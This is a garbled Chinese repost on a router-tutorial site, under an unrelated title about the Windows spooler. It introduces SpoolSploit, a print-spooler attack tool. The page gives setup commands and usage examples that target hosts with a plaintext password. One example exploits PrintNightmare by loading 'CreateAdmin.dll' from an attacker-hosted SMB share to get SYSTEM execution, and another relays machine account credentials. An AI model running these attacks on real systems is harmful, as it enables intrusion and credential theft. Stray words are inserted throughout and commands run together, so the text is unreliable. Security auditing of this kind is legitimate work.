win10spool-(win10spooler无法启动)

来源:191路由网 2022-12-18 22:29:20

(win10spooler无法启动)

关于SpoolSploit

SpoolSploit是一款针对Windows打印后台处理程序(print spooler)安全审计工具,研究人员可以使用SpoolSploit检测Windows打印后台处理程序(print spooler)存在的安全漏洞,并通过实际使用技术进行渗透试验或安全审计。

SpoolSploit还包装了许多其他实用工具,用于实际漏洞利用和渗透试验。

SpoolSploit还包装了许多其他实用工具,用于实际的漏洞利用和渗透测试。通过升级权限和在具有完全系统访问权限的节点上恶意执行计算机账户凭证,实现了两种方法DLL。

快速开始

自项目发布之日起,SpoolSploit Docker最新版本的容器macOS、Ubuntu Linux和Windows 10成功测试。

我们建议用户在这里SpoolSploit Docker在容器中进行渗透试验或中继试验,并托管相应的DLL然后确保文件运行Docker在容器主机上打开未使用的445端口。在Windows这种情况在主机上运行时最为常见,因为默认情况下使用端口445。如果您的主机上端口445已被占用或无法使用,您可电脑 以在网桥模式下配备网络适配器的虚拟机中运行Docker容器即可。

工具下载&访问SpoolSploit容器

首先,用以下命令将项目源码克隆到本地:

git clone https://github.com/BeetleChunks/SpoolSploit

接下来,构建SpoolSploit Docker容器镜像:

cd SpoolSploitsudo docker build -t spoolsploit .

创建并启动SpoolSploit Docker容器:

sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest

绑定容器:

sudo docker exec -it spoolsploit /bin/bash

命令行使用usage: spool_sploit.py[-h]-a{spoolsample,nightmare}-rH RHOST -rP{139,445}[-lH LHOST][-lS LSHARE]-d DOMAIN -u USER -p PASSWDoptional arguments: -h, --help 显示并退出帮助信息 -a{spoolsample,nightmare}, --attack{spoolsample,nightmare}需要在目标主机上执行的测试类型 -rH RHOST, --rhost RHOST 远程目标IP、CIDR范围或文件名 (file:<path>) -rP{139,445}, --rport{139,445}远程SMB服务器端口 -lH LHOST, --lhost LHOST 监控主机名或IP地址 -lS LSHARE, --lshare LSHARE 电脑 SMB共享 (UNC) -d DOMAIN, --domain DOMAIN 身份认证域名 -u USER, --username USER 身份认证用户名 -p PASSWD, --password PASSWD 身份认证密码工机使用样例

使用样例1python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

使用样例2python3 spool_sploit.py -a nightmare -lS '\\\\10.14.1.24\\C$\\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10SpoolSample - Windows获取设备账户凭证和中继

PrintNightmare (CVE-2021-1675) - 在目标Windows设备电脑上以SYSTEM恶意执行权限DLLsudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'

截图用于工具

项目地址

SpoolSploit:https://github.com/BeetleChunks/SpoolSploit
电脑
点击展开全文

相关阅读

启动u盘ntfsfat32-(怎么制作启动U盘)

(如何制作启动U盘)说到U盘,相信很多朋友对它既熟悉又陌生。我们经常在学习和工作中使用它;奇怪?你只知道U盘体积小,但是可以存储很多文件,但是你还知道什么呢?相信很多朋友在格式化U盘时都会遇到格式选择,FAT32、NTFS和exFAT,如何选择?这三者有什么区别?1、FAT3...

2022-12-18

win10spool-(win10spooler无法启动)

(win10spooler无法启动)关于SpoolSploitSpoolSploit是一款针对Windows打印后台处理程序(printspooler)安全审计工具,研究人员可以使用SpoolSploit检测Windows打印后台处理程序(printspooler)存在的安全漏洞,并通过实际使用技术进行渗透试验或安全审计。SpoolSploit还包装了...

2022-12-18

不用电脑u盘安装win7系统怎么办-(不用电脑u盘安装win7系统怎么办)

(不需要安装电脑u盘win7系统怎么办?u盘安装win7系统教程图,今天,我要教你如何使用我们的u盘启动盘为我们的计算机安装系统电脑首先要提前准备好u盘启动盘,接下来呢我们需要注意的一件事是我们usb选择每个品牌的计算机启动方向快捷键可能会有所不同一般是f9f10f11或者...

2022-12-18

用uefi无法启动u盘-(uefi无法启动u盘安装win10)

(uefiu盘安装无法启动win10)我们在安装Windows在10系统的过程中,不可避免地会出现一些无法安装的情况,但实际上是有一定原因的,找到原因后,才能对症下药。最近有用户说自己安装了Win10系统时,提示无法安装Windows因为这台电脑的磁盘布局不受影响UEFI固件问题,那么这是什么原因呢?下面的安装之家将分享无法安装Windows这台电脑磁...

2022-12-18

xps13win10升级-()

()12月13日,微软宣布停止停止电脑win除了企业版,所有版本的更新近日,微软大力推广Windows11系统甚至适应了低配电脑到底你选择win10还是win11呢?微软推广windows一方面宣布取消11windows只有企业的长期版本延长了服务补丁更新日期。今年5月,微...

2022-12-18

191路由网 - 192.168.1.1,192.168.0.1无线路由器设置教程

版权声明:本站的文章和图片来自互联网收集,仅做分享之用如有侵权请联系站长,我们将在24小时内删除